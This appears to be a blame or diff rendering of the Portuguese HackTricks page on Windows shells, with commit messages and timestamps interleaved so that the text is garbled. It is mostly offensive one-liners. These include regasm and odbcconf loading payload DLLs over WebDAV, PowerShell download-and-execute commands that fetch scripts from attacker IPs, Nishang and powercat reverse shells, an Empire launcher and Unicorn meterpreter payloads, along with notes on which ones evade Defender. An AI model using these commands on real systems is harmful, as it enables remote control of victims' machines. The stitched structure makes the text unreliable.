											
										
										
											2023-06-06 18:56:34 +00:00
+								**Não detectado**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## **Regasm/Regsvc**
 								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **svchost.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Payload escrito no disco: **cache local do cliente WebDAV**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								**Eu não tentei**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [master] one page modified
											
										
										
											2020-12-24 11:57:24 +00:00
+								[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## Odbcconf
 								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **svchost.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga escrita no disco: **cache local do cliente WebDAV**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Eu não tentei**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [master] one page modified
											
										
										
											2020-12-24 11:57:24 +00:00
+								[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								## Shells do Powershell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								### PS-Nishang
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Na pasta **Shells**, existem vários shells diferentes. Para baixar e executar o Invoke-_PowerShellTcp.ps1_ faça uma cópia do script e adicione ao final do arquivo:
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Comece a servir o script em um servidor web e execute-o no final da vítima:
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Defender ainda não o detecta como código malicioso (ainda, 3/04/2019).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								**TODO: Verificar outros shells do nishang**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								### **PS-Powercat**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [master] one page modified
											
										
										
											2020-12-24 11:57:24 +00:00
+								[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Baixe, inicie um servidor web, inicie o ouvinte e execute no lado da vítima:
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Defender ainda não o detecta como código malicioso (ainda, 3/04/2019).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Outras opções oferecidas pelo powercat:**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Conexão de shell, Shell reverso (TCP, UDP, DNS), Redirecionamento de porta, upload/download, Gerar payloads, Servir arquivos...
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Serve a cmd Shell:
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								powercat -l -p 443 -e cmd
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Send a cmd Shell:
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								powercat -c 10.1.1.1 -p 443 -e cmd
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Send a powershell:
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								powercat -c 10.1.1.1 -p 443 -ep
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Send a powershell UDP:
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								powercat -c 10.1.1.1 -p 443 -ep -u
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								TCP Listener to TCP Client Relay:
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								powercat -l -p 8000 -r tcp:10.1.1.16:443
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								powercat -c 10.1.1.15 -p 443 -e cmd -g
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Start A Persistent Server That Serves a File:
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								powercat -l -p 443 -i C:\inputfile -rep
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								### Empire
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Crie um iniciador powershell, salve-o em um arquivo e faça o download e execute-o.
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Detectado como código malicioso**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								### MSF-Unicorn
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Crie uma versão em powershell de uma backdoor do metasploit usando o unicorn
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Inicie o msfconsole com o recurso criado:
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								msfconsole -r unicorn.rc
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Inicie um servidor web servindo o arquivo _powershell\_attack.txt_ e execute no alvo:
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Detectado como código malicioso**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								## Mais
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								[PS>Attack](https://github.com/jaredhaight/PSAttack) Console PS com alguns módulos ofensivos PS pré-carregados (cifrado)\
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								WinPWN](https://github.com/SecureThisShit/WinPwn) Console PS com alguns módulos ofensivos PS e detecção de proxy (IEX)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								## Bibliografia
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
 								* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
 								* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
 								* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
 								* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
 								* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2023-07-14 14:49:16 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Outras maneiras de apoiar o HackTricks:
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
 								* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>